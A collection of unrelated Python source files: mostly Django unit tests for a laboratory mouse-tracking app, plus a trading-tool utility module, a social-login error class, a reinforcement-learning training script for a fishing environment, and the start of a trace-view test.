mouse_list.add_mouse([data_to_post_2, data_to_post_3])
# Make the request and check for the status code
make_request_and_check(
test_cases=self,
data=mouse_list,
url='/harvestedmouse/insert',
request_object=self.factory.post,
expected_status_code=201,
view_class=harvested_mouse_insertion,
viewer=self.viewer
)
# Change handler to handler2
data_to_post_2.project_title = 'ABC'
# Change handler to handler2
data_to_post_3.project_title = 'CBA'
# Change pfaRecord.smallIntestineTumor to 16
data_to_post_2.pfa_record.small_intenstine_tumor = 16
# Change pfaRecord.smallIntestineTumor to 15
data_to_post_3.pfa_record.small_intenstine_tumor = 15
# Make the request and check for the status code
make_request_and_check(
test_cases=self,
data=mouse_list,
url='/harvestedmouse/update',
request_object=self.factory.put,
expected_status_code=200,
view_class=harvested_mouse_update,
viewer=self.viewer
)
# The remaining should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=3,
list_to_matched=['ABC', 'CBA'],
expect_num_of_remain=0,
keyword='project_title',
adapter=self.adapter
)
# The remaining should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=3,
list_to_matched=[1, 16, 15],
expect_num_of_remain=0,
keyword='pfa_record',
child_keyword='small_intenstine_tumor',
adapter=self.adapter
)
# Pass requirement
    # 1. Delete the inserted mouse handler2
    # 2. handler2 should not exist in the list
def test_harvest_mouse_delete(self):
# Force get the new mouse list from the db
force_refresh_cache(self)
data_to_post = create_mouse_object(
handler='handler2',
physical_id='1234567B',
gender='M',
mouseline='mouseLine1',
genotype='genoType1',
birth_date=datetime.now().date(),
end_date=datetime.now().date(),
cog='True',
phenotype='phenoType1',
project_title='projectTitle1',
experiment='experiment1',
comment='comment1',
pfa_record=AdvancedRecord(
1, 1, 1, 1, 1, 1, '1'
),
freeze_record=Record(
1, 1, '1'
)
)
# Make the request and check for the status code
# Insert handler 2 mouse into db
make_request_and_check(
test_cases=self,
data=data_to_post,
url='/harvestedmouse/insert',
request_object=self.factory.post,
expected_status_code=201,
view_class=harvested_mouse_insertion,
viewer=self.viewer
)
# Check handler 2 is inserted into db
# by retrieving entire mouse entries
# The remaining should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=2,
list_to_matched=['handler1', 'handler2'],
expect_num_of_remain=0,
keyword='handler',
adapter=self.adapter
)
# Make request to delete the handler 2 mouse
# Make the request and check for the status code
make_request_and_check(
test_cases=self,
data=data_to_post,
url='/harvestedmouse/delete',
request_object=self.factory.delete,
expected_status_code=200,
view_class=harvested_mouse_delete,
viewer=self.viewer
)
        # After deleting the handler2 mouse
        # only handler1 remains
        # The remaining should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=1,
list_to_matched=['handler1'],
expect_num_of_remain=0,
keyword='handler',
adapter=self.adapter
)
# Pass requirement
    # 1. Delete the inserted mice handler2 and handler3
    # 2. handler2 and handler3 should not exist in the list
def test_advanced_harvest_mouse_multiple_delete(self):
# Force get the new mouse list from the db
force_refresh_cache(self)
data_to_post_2 = create_mouse_object(
handler='handler2',
physical_id='1234567B',
gender='M',
mouseline='mouseLine1',
genotype='genoType1',
birth_date=datetime.now().date(),
end_date=datetime.now().date(),
cog='True',
phenotype='phenoType1',
project_title='projectTitle1',
experiment='experiment1',
comment='comment1',
pfa_record=AdvancedRecord(
1, 1, 1, 1, 1, 1, '1'
),
freeze_record=Record(
1, 1, '1'
)
)
# Make the request and check for the status code
# Insert handler 2 mouse into db
make_request_and_check(
test_cases=self,
data=data_to_post_2,
url='/harvestedmouse/insert',
request_object=self.factory.post,
expected_status_code=201,
view_class=harvested_mouse_insertion,
viewer=self.viewer
)
data_to_post_3 = create_mouse_object(
handler='handler3',
physical_id='1234567C',
gender='M',
mouseline='mouseLine1',
genotype='genoType1',
birth_date=datetime.now().date(),
end_date=datetime.now().date(),
cog='True',
phenotype='phenoType1',
project_title='projectTitle1',
experiment='experiment1',
comment='comment1',
pfa_record=AdvancedRecord(
1, 1, 1, 1, 1, 1, '1'
),
freeze_record=Record(
1, 1, '1'
)
)
# Make the request and check for the status code
# Insert handler 2 mouse into db
make_request_and_check(
test_cases=self,
data=data_to_post_3,
url='/harvestedmouse/insert',
request_object=self.factory.post,
expected_status_code=201,
view_class=harvested_mouse_insertion,
viewer=self.viewer
)
        # After inserting 2 mice
        # there will be 3 mice: handler1, handler2 and handler3
        # The remaining should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=3,
list_to_matched=['handler1', 'handler2', 'handler3'],
expect_num_of_remain=0,
keyword='handler',
adapter=self.adapter
)
mouse_list = MouseList()
mouse_list.add_mouse([data_to_post_2, data_to_post_3])
# Delete handler 2 and handler 3
# Make request to delete the handler 2 mouse
# Make the request and check for the status code
make_request_and_check(
test_cases=self,
data=mouse_list,
url='/harvestedmouse/delete',
request_object=self.factory.delete,
expected_status_code=200,
view_class=harvested_mouse_delete,
viewer=self.viewer
)
        # After deleting the handler2 and handler3 mice
        # only handler1 remains
        # The remaining should be 0
check_model_view_objects(
test_cases=self,
view_list_class=harvested_mouse_list,
view_url='/harvestedmouse/force_list',
expect_num_of_return=1,
list_to_matched=['handler1'],
expect_num_of_remain=0,
keyword='handler',
adapter=self.adapter
)
'''
MVC Test
'''
def str_time_prop(start, end, format_input, prop):
"""Get a time at a proportion of a range of two formatted times.
start and end should be strings specifying times formated in the
given format (strftime-style), giving an interval [start, end].
prop specifies how a proportion of the interval to be taken after
start. The returned time will be in the specified format.
"""
stime = time.mktime(time.strptime(start, format_input))
etime = time.mktime(time.strptime(end, format_input))
ptime = stime + prop * (etime - stime)
return time.strftime(format_input, time.localtime(ptime))
def random_date(start, end, prop):
return str_time_prop(start, end, '%Y-%m-%d', prop)
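# Illustrative example (an assumption for clarity, not used by the tests below):
# a proportion of 0.5 yields the midpoint of the interval, e.g.
#   random_date('2008-01-01', '2008-01-03', 0.5)  ->  '2008-01-02'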
def random_boolean():
return random.choice([True, False])
def get_random_string(length):
letters = string.ascii_lowercase
result_str = ''.join(random.choice(letters) for i in range(length))
return result_str
def get_random_gender():
return random.choice(['Male', 'Female'])
def get_random_hanlder():
return random.choice(['Shih Han', 'Alex', 'Hui San', 'David', 'Mark'])
##############################################################################################################
# Unit Test name: Mouse Model test case
# Target: Mouse, MouseList
# Description:
# 1. Populate information into Mouse, retrieve the same information from the mouse
# 2. Testing basic manipulation of MouseList
##############################################################################################################
class ModelTestCase(TestCase):
# Setup function, insert required objects into the database
def setUp(self) -> None:
self.physical_id = get_random_string(8)
self.handler = get_random_hanlder()
self.gender = get_random_gender()
self.mouseline = get_random_string(8)
self.genotype = get_random_string(8)
self.birth_date = random_date("2008-1-1", "2009-1-1", random.random())
self.end_date = random_date("2008-1-1", "2009-1-1", random.random())
self.cog = str(random_boolean())
self.phenotype = get_random_string(8)
self.project_title = get_random_string(6)
self.experiment = get_random_string(6)
self.comment = get_random_string(30)
self.sample_mouse = Mouse(physical_id=self.physical_id,
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
# Pass requirement
    # 1. Check that the information created and populated is the same
def test_model_mouse(self):
if not (self.sample_mouse.physical_id == self.physical_id and
self.sample_mouse.handler == self.handler and
self.sample_mouse.genotype == self.genotype):
self.assertTrue(False)
# Pass requirement
    # 1. Check if the mouse can be retrieved correctly
def test_model_mouse_list_add_retrieve(self):
self.check_moust_list = []
self.mouselist = MouseList()
for i in range(1, 10):
m = Mouse(physical_id=get_random_string(8),
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.check_moust_list.append(m)
self.mouselist.add_mouse(m)
for m in self.check_moust_list:
self.mouselist.remove_mouse(m)
if self.mouselist.get_size() != 0:
self.assertTrue(False)
self.check_moust_list = []
self.mouselist = MouseList()
# Using different mouse but with same id, different ref
for i in range(1, 10):
m = Mouse(physical_id=get_random_string(8),
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.check_moust_list.append(m)
self.mouselist.add_mouse(copy.deepcopy(m))
for m in self.check_moust_list:
self.mouselist.remove_mouse(m)
if self.mouselist.get_size() != 0:
self.assertTrue(False)
# Pass requirement
    # 1. Check if the mouse list can be retrieved correctly
def test_model_mouse_List_equality_matched(self):
self.check_moust_list = []
self.mouselist = MouseList()
self.sample_mouse_list = MouseList()
for i in range(1, 10):
m = Mouse(physical_id=get_random_string(8),
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.check_moust_list.append(m)
self.mouselist.add_mouse(m)
self.sample_mouse_list.add_mouse(m)
if not (self.mouselist == self.sample_mouse_list):
self.assertTrue(False)
# Clear everything
self.mouselist.clear()
self.sample_mouse_list.clear()
for i in range(1, 10):
physical_id = get_random_string(8)
m = Mouse(physical_id=physical_id,
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
m2 = Mouse(physical_id=physical_id[::-1],
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.mouselist.add_mouse(m)
self.sample_mouse_list.add_mouse(m2)
if self.mouselist == self.sample_mouse_list:
self.assertTrue(False)
# Pass requirement
    # 1. Check if the mouse list can be retrieved correctly
def test_model_mouse_List_update_matched(self):
# Tested with modifying handler with same ref
self.mouselist = MouseList()
self.mouselist.add_mouse(self.sample_mouse)
self.sample_mouse.handler = 'ABC'
self.mouselist.update_mouse(self.sample_mouse)
mouse = self.mouselist.get_mouse_by_id(self.sample_mouse.physical_id)
if not(mouse.handler == 'ABC'):
self.assertTrue(False)
# Tested with different reference address
# Creating a diff address of the mouse with different handler
# but with same physical id
m2 = Mouse(physical_id=self.physical_id,
handler='CBA',
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.mouselist.update_mouse(m2)
mouse = self.mouselist.get_mouse_by_id(self.sample_mouse.physical_id)
if not(mouse.handler == 'CBA'):
self.assertTrue(False)
##############################################################################################################
# Unit Test name: Model Adapter test case
# Target: Mouse, MouseList
# Description:
# 1. Populated a predefined mouse list
# 2. Make sure the converted information in the xml file matches the predefined mouse list
##############################################################################################################
class ModelAdapterTestCase(TestCase):
# Setup function, insert required objects into the database
def setUp(self) -> None:
self.physical_id = 'abc'
self.handler = 'Shih Han'
self.gender = 'Male'
self.mouseline = 'mouseline1'
self.genotype = 'genotype1'
self.birth_date = '2020-06-11'
self.end_date = '2020-05-21'
self.cog = '1'
self.phenotype = 'Phenotyp1'
self.project_title = 'abc'
self.experiment = 'exprement1'
self.comment = 'comment1'
self.sample_mouse_1 = Mouse(physical_id=self.physical_id,
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.sample_mouse_2 = Mouse(physical_id=self.physical_id[::-1],
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.mouse_list = MouseList()
self.mouse_list.add_mouse([self.sample_mouse_1, self.sample_mouse_2])
self.adapter = XmlModelAdapter()
# Pass requirement
    # 1. Check if the mouse can be retrieved correctly
def test_model_mouse_matched(self):
# open xml file
with open('harvestmouseapp/mvc_model/sample/singlemouse.xml') as r_open:
xml_raw_data = r_open.read()
# transform the data into mouse object
converted = self.adapter.transform(xml_raw_data)
if not (self.sample_mouse_1.physical_id == converted.physical_id and
self.sample_mouse_1.handler == converted.handler and
self.sample_mouse_1.genotype == converted.genotype):
self.assertTrue(False)
# Pass requirement
    # 1. Check if the mouse list can be retrieved correctly
def test_model_mouse_List_matched(self):
# open xml file
with open('harvestmouseapp/mvc_model/sample/groupmouse.xml') as r_open:
xml_raw_data = r_open.read()
# transform the data into mouse object
converted_list = self.adapter.transform(xml_raw_data)
for m in converted_list:
if self.mouse_list.is_mouse_in_list(physical_id=m.physical_id):
# Compare with the first mouse
if self.sample_mouse_1.physical_id == m.physical_id:
if not (self.sample_mouse_1.physical_id == m.physical_id and
self.sample_mouse_1.handler == m.handler and
self.sample_mouse_1.genotype == m.genotype):
self.assertTrue(False)
# Compare with the second mouse
elif self.sample_mouse_2.physical_id == m.physical_id:
if not (self.sample_mouse_2.physical_id == m.physical_id and
self.sample_mouse_2.handler == m.handler and
self.sample_mouse_2.genotype == m.genotype):
self.assertTrue(False)
else:
# nothing has matched, asserted
self.assertTrue(False)
# Remove the mouse from the mouse list regardless
# of the reference, compare the id only
self.mouse_list.remove_mouse(m)
else:
# nothing in the current mouse list, asserted
self.assertTrue(False)
# must be 0 if everything matched perfectly
if not (len(self.mouse_list) == 0):
self.assertTrue(False)
##############################################################################################################
# Unit Test name: Model Viewer test case
# Target: Mouse, MouseList
# Description:
# 1. Populated a predefined mouse list
# 2. Make sure the converted information in the xml file matches the predefined mouse list
# 3. Check if the xml parser and object xml serializer work correctly
##############################################################################################################
class ModelViewerTestCase(TestCase):
# Setup function, insert required objects into the database
def setUp(self) -> None:
self.physical_id = 'abc'
self.handler = 'Shih Han'
self.gender = 'Male'
self.mouseline = 'mouseline1'
self.genotype = 'genotype1'
self.birth_date = '2020-06-11'
self.end_date = '2020-05-21'
self.cog = '1'
self.phenotype = 'Phenotyp1'
self.project_title = 'abc'
self.experiment = 'exprement1'
self.comment = 'comment1'
self.sample_mouse_1 = Mouse(physical_id=self.physical_id,
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.sample_mouse_2 = Mouse(physical_id=self.physical_id[::-1],
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.mouse_list = MouseList()
self.mouse_list.add_mouse([self.sample_mouse_1, self.sample_mouse_2])
self.adapter = XmlModelAdapter()
self.viewer = XmlMouseViewer()
# Pass requirement
    # 1. Check if the mouse can be retrieved correctly
def test_viewer_mouse_matched(self):
# open xml file
# Convert mouse sample to xml and save it
xml_data = self.viewer.transform(self.sample_mouse_1)
with open('testing.xml', 'w') as w_open:
w_open.write(xml_data)
with open('testing.xml') as r_open:
xml_raw_data = r_open.read()
# transform the data into mouse object
converted = self.adapter.transform(xml_raw_data)
if not (self.sample_mouse_1.physical_id == converted.physical_id and
self.sample_mouse_1.handler == converted.handler and
self.sample_mouse_1.genotype == converted.genotype):
self.assertTrue(False)
os.remove('testing.xml')
# Pass requirement
    # 1. Check if the mouse list can be retrieved correctly
def test_viewer_mouse_list_matched(self):
# open xml file
# Convert mouse sample to xml and save it
xml_data = self.viewer.transform(self.mouse_list)
with open('testing.xml', 'w') as w_open:
w_open.write(xml_data)
with open('testing.xml') as r_open:
xml_raw_data = r_open.read()
# transform the data into mouse object
converted_list = self.adapter.transform(xml_raw_data)
for m in converted_list:
if self.mouse_list.is_mouse_in_list(physical_id=m.physical_id):
# Compare with the first mouse
if self.sample_mouse_1.physical_id == m.physical_id:
if not (self.sample_mouse_1.physical_id == m.physical_id and
self.sample_mouse_1.handler == m.handler and
self.sample_mouse_1.genotype == m.genotype):
self.assertTrue(False)
# Compare with the second mouse
elif self.sample_mouse_2.physical_id == m.physical_id:
if not (self.sample_mouse_2.physical_id == m.physical_id and
self.sample_mouse_2.handler == m.handler and
self.sample_mouse_2.genotype == m.genotype):
self.assertTrue(False)
else:
# nothing has matched, asserted
self.assertTrue(False)
# Remove the mouse from the mouse list regardless
# of the reference, compare the id only
self.mouse_list.remove_mouse(m)
else:
# nothing in the current mouse list, asserted
self.assertTrue(False)
# must be 0 if everything matched perfectly
if not (len(self.mouse_list) == 0):
self.assertTrue(False)
os.remove('testing.xml')
##############################################################################################################
# Unit Test name: SQLite Database test case
# Target: Mouse, MouseList
# Description:
# 1. Validation of Create, Update, Read and Delete on the mouse database
##############################################################################################################
class SqliteDatabaserTestCase(TestCase):
def setUp(self) -> None:
self.physical_id = 'abc'
self.handler = 'Shih Han'
self.gender = 'Male'
self.mouseline = 'mouseline1'
self.genotype = 'genotype1'
self.birth_date = '2020-06-11'
self.end_date = '2020-05-21'
self.cog = '1'
self.phenotype = 'Phenotyp1'
self.project_title = 'abc'
self.experiment = 'exprement1'
self.comment = 'comment1'
self.sample_mouse_1 = Mouse(physical_id=self.physical_id,
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.sample_mouse_2 = Mouse(physical_id=self.physical_id[::-1],
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.mouse_list = MouseList()
self.mouse_list.add_mouse([self.sample_mouse_1, self.sample_mouse_2])
self.db_adapter = GenericSqliteConnector()
self.adapter = XmlModelAdapter()
self.viewer = XmlMouseViewer()
self.db_adapter.create_mouse(self.mouse_list)
# Pass requirement
    # 1. Check if the mouse can be retrieved correctly from the database
def test_get_mouse_list_from_db(self):
mouse_output = self.db_adapter.get_all_mouse()
if not (mouse_output == self.mouse_list):
self.assertTrue(False)
# Pass requirement
    # 1. Check if the mouse can be retrieved correctly from the database
def test_create_list_into_db(self):
self.sample_mouse_3 = Mouse(physical_id=self.physical_id + '1',
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.sample_mouse_4 = Mouse(physical_id=self.physical_id[::-1] + '3',
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.mouse_list.add_mouse([self.sample_mouse_3, self.sample_mouse_4])
try:
self.db_adapter.create_mouse(self.mouse_list)
except DuplicationMouseError as e:
print(e.message)
mouse_output = self.db_adapter.get_all_mouse()
if not (mouse_output == self.mouse_list):
self.assertTrue(False)
# cache integrity check
mouse_output = self.db_adapter.get_all_mouse()
if not (mouse_output == self.mouse_list):
self.assertTrue(False)
def test_update_mouse_list(self):
# Force to get a new mouse list
mouse_list_before = copy.deepcopy(self.db_adapter.get_all_mouse())
self.sample_mouse_2_copy = copy.deepcopy(self.sample_mouse_2)
self.sample_mouse_2_copy.handler = 'CBA'
self.db_adapter.update_mouse(self.sample_mouse_2_copy)
# Force to get a new mouse list
mouse_list = self.db_adapter.get_all_mouse()
mouse = mouse_list.get_mouse_by_id(self.sample_mouse_2_copy.physical_id)
if not mouse.handler == 'CBA':
self.assertTrue(False)
if mouse_list_before == mouse_list:
self.assertTrue(False)
def test_update_mouse_list_list(self):
# Force to get a new mouse list
mouse_list_before = copy.deepcopy(self.db_adapter.get_all_mouse())
self.sample_mouse_1_copy = copy.deepcopy(self.sample_mouse_1)
self.sample_mouse_1_copy.handler = 'ABC'
self.sample_mouse_2_copy = copy.deepcopy(self.sample_mouse_2)
self.sample_mouse_2_copy.handler = 'CBA'
updating_mouse_list = MouseList()
updating_mouse_list.add_mouse([self.sample_mouse_1_copy, self.sample_mouse_2_copy])
self.db_adapter.update_mouse(updating_mouse_list)
# Force to get a new mouse list
mouse_list = self.db_adapter.get_all_mouse()
mouse = mouse_list.get_mouse_by_id(self.sample_mouse_1_copy.physical_id)
if not mouse.handler == 'ABC':
self.assertTrue(False)
mouse = mouse_list.get_mouse_by_id(self.sample_mouse_2_copy.physical_id)
if not mouse.handler == 'CBA':
self.assertTrue(False)
if mouse_list_before == mouse_list:
self.assertTrue(False)
def test_update_mouse_list_delete(self):
self.db_adapter.delete_mouse(self.sample_mouse_1)
self.db_adapter.delete_mouse(self.sample_mouse_2)
mouselist = self.db_adapter.get_all_mouse()
if not(mouselist.get_size() == 0):
self.assertTrue(False)
mouselist = self.db_adapter.get_all_mouse()
if not(mouselist.get_size() == 0):
self.assertTrue(False)
def test_update_mouse_list_delete_list(self):
to_be_deleted = MouseList()
to_be_deleted.add_mouse([self.sample_mouse_1, self.sample_mouse_2])
self.db_adapter.delete_mouse(to_be_deleted)
mouselist = self.db_adapter.get_all_mouse()
if not(mouselist.get_size() == 0):
self.assertTrue(False)
mouselist = self.db_adapter.get_all_mouse()
if not(mouselist.get_size() == 0):
self.assertTrue(False)
def test_update_mouse_list_delete_particular_check(self):
self.db_adapter.delete_mouse(self.sample_mouse_2)
mouselist = self.db_adapter.get_all_mouse()
if not(mouselist.get_size() == 1):
self.assertTrue(False)
mouse = mouselist.get_mouse_by_id(self.sample_mouse_1.physical_id)
if mouse is None:
self.assertTrue(False)
mouse = mouselist.get_mouse_by_id(self.sample_mouse_2.physical_id)
if mouse is not None:
self.assertTrue(False)
mouselist = self.db_adapter.get_all_mouse()
if not(mouselist.get_size() == 1):
self.assertTrue(False)
mouse = mouselist.get_mouse_by_id(self.sample_mouse_1.physical_id)
if mouse is None:
self.assertTrue(False)
mouse = mouselist.get_mouse_by_id(self.sample_mouse_2.physical_id)
if mouse is not None:
self.assertTrue(False)
##############################################################################################################
# Unit Test name: Mouse Filter class test case
# Target: Mouse, MouseList
# Description:
# 1. Validation of filter functionality on the mouse list model
##############################################################################################################
class MouseFilterTestCase(TestCase):
def setUp(self) -> None:
self.physical_id = 'abc'
self.handler = 'Shih Han'
self.gender = 'Male'
self.mouseline = 'mouseline1'
self.genotype = 'genotype1'
self.birth_date = '2020-06-11'
self.end_date = '2020-05-21'
self.cog = '1'
self.phenotype = 'Phenotyp1'
self.project_title = 'abc'
self.experiment = 'exprement1'
self.comment = 'comment1'
self.sample_mouse_1 = Mouse(physical_id=self.physical_id,
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.sample_mouse_2 = Mouse(physical_id=self.physical_id[::-1],
handler=self.handler,
gender=self.gender,
mouseline=self.mouseline,
genotype=self.genotype,
birth_date=self.birth_date,
end_date=self.end_date,
cog=self.cog,
phenotype=self.phenotype,
project_title=self.project_title,
experiment=self.experiment,
comment=self.comment)
self.mouse_list = MouseList()
self.mouse_list.add_mouse([self.sample_mouse_1, self.sample_mouse_2])
self.filter = MouseFilter()
def test_simple_mouse_filter_case(self):
# Current mouse list contains mouse with physical_id of 'abc' and 'cba'
# Test case 1
# Retrieve only abc, filter physical_id by value of 'ab'
mouse_list = self.filter.filter(
self.mouse_list,
FilterOption(
column_name='physical_id',
value='ab'
))
if len(mouse_list) != 1:
self.assertTrue(False)
if mouse_list.get_mouse_by_id('abc') is None:
self.assertTrue(False)
|
import datetime
import os
from pathlib import Path
from shutil import copyfile
from typing import Dict, Any
import pandas as pd
import pytz
import unicodedata
import re
def slugify(value, allow_unicode=False):
"""
Taken from https://github.com/django/django/blob/master/django/utils/text.py
Convert to ASCII if 'allow_unicode' is False. Convert spaces or repeated
dashes to single dashes. Remove characters that aren't alphanumerics,
underscores, or hyphens. Convert to lowercase. Also strip leading and
trailing whitespace, dashes, and underscores.
"""
value = str(value)
if allow_unicode:
value = unicodedata.normalize('NFKC', value)
else:
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore').decode('ascii')
value = re.sub(r'[^\w\s-]', '', value.lower())
return re.sub(r'[-\s]+', '-', value).strip('-_')
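# Illustrative examples (not part of the original module):
#   slugify("Héllo,  Wörld!")                     -> 'hello-world'
#   slugify("Héllo,  Wörld!", allow_unicode=True) -> 'héllo-wörld'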
def get_history_dir(config: Dict[str, Any]) -> Path:
"""
Return the directory where all the runs are stored.
:param config: config file
:return: path to folder
"""
folder = config["history_data_dir"]
return folder
def get_run_history_dir(config: Dict[str, Any], run_id: str) -> Path:
"""
Return the directory where the current run is stored.
:param config: config file
:param run_id: run id
:return: path to folder
"""
folder = Path(get_history_dir(config), run_id)
return folder
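# Illustrative: with a hypothetical config = {"history_data_dir": "history"},
# get_run_history_dir(config, "run-001") returns Path("history/run-001").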
def copy_file_to_folder(file_path: Path, folder_path: Path) -> None:
"""
Copy file to folder and keep same name.
:param file_path: path to file
:param folder_path: path to folder
:return: None
"""
copyfile(file_path, os.path.join(folder_path, os.path.basename(file_path)))
def parse_datetime_string(datetime_string: str) -> datetime.datetime:
"""
Parse datetime in "31.01.2021 00:00:00" format.
:param datetime_string: string representation
:return: datetime object
"""
if " " in datetime_string:
return datetime.datetime.strptime(datetime_string, '%d.%m.%Y %H:%M:%S').replace(tzinfo=pytz.utc)
else:
return datetime.datetime.strptime(datetime_string, '%d.%m.%Y').replace(tzinfo=pytz.utc)
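# Illustrative: parse_datetime_string("31.01.2021 00:00:00") and
# parse_datetime_string("31.01.2021") both yield datetime(2021, 1, 31, tzinfo=pytz.utc).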
def sanitize_pair(pair: str) -> str:
"""
    Remove separator symbols from a pair string.
    :param pair: pair name (BTC/USDT)
    :return: pair without separator symbols (BTCUSDT)
"""
return pair.replace("/", "").replace("\\", "").replace("-", "").replace("_", "")
def timeframe_int_to_str(timeframe: int) -> str:
"""
Convert timeframe from integer to string
:param timeframe: minutes per candle (240)
:return: string representation for API (4h)
"""
if timeframe < 60:
return f"{timeframe}m"
elif timeframe < 1440:
return f"{int(timeframe / 60)}h"
else:
return f"{int(timeframe / 1440)}d"
def timeframe_str_to_int(timeframe: str) -> int:
"""
Convert timeframe from string to integer
:param timeframe: string representation from API (4h)
:return: minutes per candle (240)
"""
if "m" in timeframe:
return int(timeframe.replace("m", ""))
elif "h" in timeframe:
return int(timeframe.replace("h", "")) * 60
elif "d" in timeframe:
return int(timeframe.replace("d", "")) * 1440
else:
raise Exception("Unsupported timeframe")
def unix_to_pdts(unix: int) -> pd.Timestamp:
"""
Convert unix timestamp (seconds) to pandas timestamp
"""
return pd.Timestamp(unix, unit='s', tz='UTC')
def pydt_to_pdts(pydt: datetime.datetime) -> pd.Timestamp:
"""
    Convert a python datetime to a pandas timestamp
"""
return pd.Timestamp(pydt, unit='s', tz='UTC')
def pdts_to_pydt(pdts: pd.Timestamp) -> datetime.datetime:
"""
Convert pandas timestamp to python datetime.
"""
return pdts.to_pydatetime()
def create_missing_columns(db_path: Path, table: str, df: pd.DataFrame) -> None:
"""
Add columns of dataframe to table in database.
:param db_path: path to sqlite db
:param table: table name
:param df: pandas dataframe
"""
from kektrade.database.types import get_engine
engine = get_engine(db_path)
with engine.connect() as con:
for column in list(df.columns):
try:
statement = f"alter table {table} add column {column}"
con.execute(statement)
            except Exception:
                # most likely the column already exists; ignore and continue
pass |
from establishment.errors.errors import ErrorList
from establishment.errors.models import get_error
class SocialAccountError(ErrorList):
GENERIC_INVALID_PROCESS = get_error(message="Invalid login process")
INVALID_SOCIAL_TOKEN = get_error(message="Invalid social token")
INVALID_SOCIAL_ACCOUNT = get_error(message="Error accessing external account (Facebook/Google/etc.)")
    SOCIAL_ACCOUNT_NO_EMAIL = get_error(message="Your external account (Facebook/Google/etc.) is not linked to an email address. "
"We require an email address to log you in.")
|
#reticulate::use_virtualenv("venv")
#reticulate::repl_python()
import gym
import gym_fishing
from stable_baselines3 import SAC
env = gym.make("fishing-v4")
model = SAC("MlpPolicy", env, verbose=0)
model.learn(total_timesteps=10000)
model.save("fishing-v4-SAC-Michael")
|
# -*- coding: utf-8 -*-
"""Test views."""
#------------------------------------------------------------------------------
# Imports
#------------------------------------------------------------------------------
import numpy as np
from numpy.testing import assert_allclose as ac
from vispy.util import keys
from phy.gui import GUI
from phy.io.mock import (artificial_traces,
artificial_spike_clusters,
)
from phy.utils import Bunch
from phy.utils._color import ColorSelector
from ..trace import TraceView, select_traces, _iter_spike_waveforms
#------------------------------------------------------------------------------
# Test trace view
#------------------------------------------------------------------------------
def test_trace_view(tempdir, qtbot):
nc = 5
ns = 9
sr = 1000.
ch = list(range(nc))
